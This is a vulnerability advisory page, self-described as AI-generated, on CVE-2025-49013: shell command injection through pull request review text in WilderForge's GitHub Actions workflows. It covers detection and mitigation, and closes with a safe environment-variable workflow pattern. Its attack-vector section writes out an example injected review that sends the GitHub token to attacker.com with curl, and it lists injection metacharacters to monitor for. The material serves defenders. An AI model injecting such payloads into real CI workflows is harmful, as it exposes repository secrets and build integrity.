CVE-2025-49013 Overview
CVE-2025-49013 is a critical command injection vulnerability affecting multiple repositories within the WilderForge organization. The vulnerability stems from unsafe usage of user-controlled variables, specifically ${{ github.event.review.body }} and similar expressions, directly within shell script contexts in GitHub Actions workflows. This code injection flaw enables malicious actors to execute arbitrary shell commands on GitHub Actions runners by submitting specially crafted pull request reviews containing shell metacharacters or commands.
The WilderForge project provides a coremodding API for the game Wildermyth, and this vulnerability affects the CI/CD infrastructure rather than the runtime software itself. Successful exploitation could lead to compromise of CI infrastructure, exposure of secrets, and manipulation of build outputs.
Critical Impact
Arbitrary command execution with workflow permissions, potentially compromising CI infrastructure, secrets, and build outputs across multiple WilderForge repositories.
Affected Products
- WilderForge/WilderForge
- WilderForge/ExampleMod
- WilderForge/WilderWorkspace
- WilderForge/WildermythGameProvider
- WilderForge/AutoSplitter
- WilderForge/SpASM
- WilderForge/thrixlvault
- WilderForge/MassHash
- WilderForge/DLC_Disabler
Discovery Timeline
- 2025-06-09 - CVE-2025-49013 published to NVD
- 2025-06-12 - Last updated in NVD database
Technical Details for CVE-2025-49013
Vulnerability Analysis
This vulnerability falls under CWE-94 (Improper Control of Generation of Code / Code Injection). The core issue lies in how GitHub Actions workflows process untrusted input from pull request events. When workflow files directly interpolate user-controlled context variables like ${{ github.event.review.body }}, ${{ github.event.issue.title }}, or ${{ github.event.pull_request.title }} within shell script blocks, the content is evaluated by the shell interpreter without proper sanitization.
An attacker with the ability to submit pull request reviews can inject shell metacharacters and commands into the review body. When the workflow runs, these injected commands execute with the full permissions granted to the workflow, which may include read/write access to repository contents, GitHub secrets, and the ability to push commits or create releases.
It's important to note that end users who only install pre-built releases or artifacts are not affected. This vulnerability does not impact runtime behavior of the compiled software unless the build outputs were produced during active exploitation.
Root Cause
The root cause is the direct use of GitHub Actions expression syntax (${{ }}) to inject user-controlled data into shell script contexts within workflow YAML files. GitHub Actions performs expression interpolation before the shell executes, meaning the raw user input becomes part of the shell command. Without proper escaping or input validation, shell metacharacters such as backticks, semicolons, pipes, and command substitution syntax (` or $()) are interpreted by the shell rather than treated as literal strings.
Attack Vector
The attack vector is network-based and requires low privileges. An attacker needs only the ability to create a pull request review on an affected repository. The attacker crafts a review body containing shell commands embedded within shell metacharacters. When a workflow triggered by pull_request_review events runs and evaluates the review body in a run: step, the injected commands execute on the GitHub Actions runner.
For example, a review body containing "; curl http://attacker.com/exfil?data=$(cat $GITHUB_TOKEN) # could exfiltrate secrets or execute arbitrary payloads. The attack requires no user interaction beyond the normal workflow triggers already configured in the repository.
The vulnerability mechanism involves the GitHub Actions workflow interpolating user-supplied data directly into shell commands. When a malicious actor submits a pull request review with embedded shell metacharacters such as command substitution or command separators, these are executed by the shell during workflow execution. Detailed technical analysis is available in the GitHub Security Advisory GHSA-m6r3-c73x-8fw5 and the GitHub Security Lab research on untrusted input.
Detection Methods for CVE-2025-49013
Indicators of Compromise
- Unexpected commands in GitHub Actions workflow logs, especially those involving network connections, file access, or secret extraction
- Pull request reviews containing shell metacharacters such as backticks, semicolons, $(...), or pipe operators
- Unusual outbound network connections from GitHub Actions runners to external hosts
- Modifications to repository secrets, environment variables, or workflow files following pull request review activity
Detection Strategies
- Use CodeQL scanning with the js-actions-command-injection query to identify vulnerable workflow patterns
- Implement workflow audit logging and review all run: steps that reference github.event.* context variables
- Monitor pull request review content for patterns matching shell injection syntax such as $(, `, ;, or |
- Enable GitHub Advanced Security features to scan workflow files for security misconfigurations
Monitoring Recommendations
- Configure alerts for workflow runs triggered by pull request reviews from external contributors
- Review GitHub Actions logs for unexpected command execution patterns or error messages indicating injection attempts
- Implement branch protection rules requiring approval before workflows execute on external pull requests
- Audit all repositories forking affected WilderForge projects for inherited vulnerable workflows
How to Mitigate CVE-2025-49013
Immediate Actions Required
- Disable GitHub Actions in affected repositories until workflows can be remediated
- Remove or modify workflows that directly interpolate user-controlled event data into shell script contexts
- Implement environment variables to safely pass user input instead of direct expression interpolation
- Review all forked repositories for inherited vulnerable workflow configurations
Patch Information
No formal patch version has been specified at this time. The vulnerability exists in GitHub Actions workflow configuration files across multiple WilderForge repositories. Remediation requires modifying the workflow YAML files to properly sanitize or avoid direct shell interpolation of user-controlled inputs. Consult the GitHub Actions Security Hardening Guide for recommended patterns.
Workarounds
- Disable GitHub Actions entirely in affected repositories as a temporary measure
- Remove affected workflows that process pull_request_review events or similar untrusted triggers
- Refactor workflows to use environment variables and avoid direct expression interpolation in shell contexts
- Implement input validation using intermediate steps that sanitize event data before use in shell commands
- Restrict workflow permissions to minimum required scopes using the permissions: key in workflow YAML
# Safe workflow pattern using environment variables
# Instead of: run: echo "${{ github.event.review.body }}"
# Use:
env:
REVIEW_BODY: ${{ github.event.review.body }}
run: |
# Access via environment variable which is properly quoted
echo "$REVIEW_BODY"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
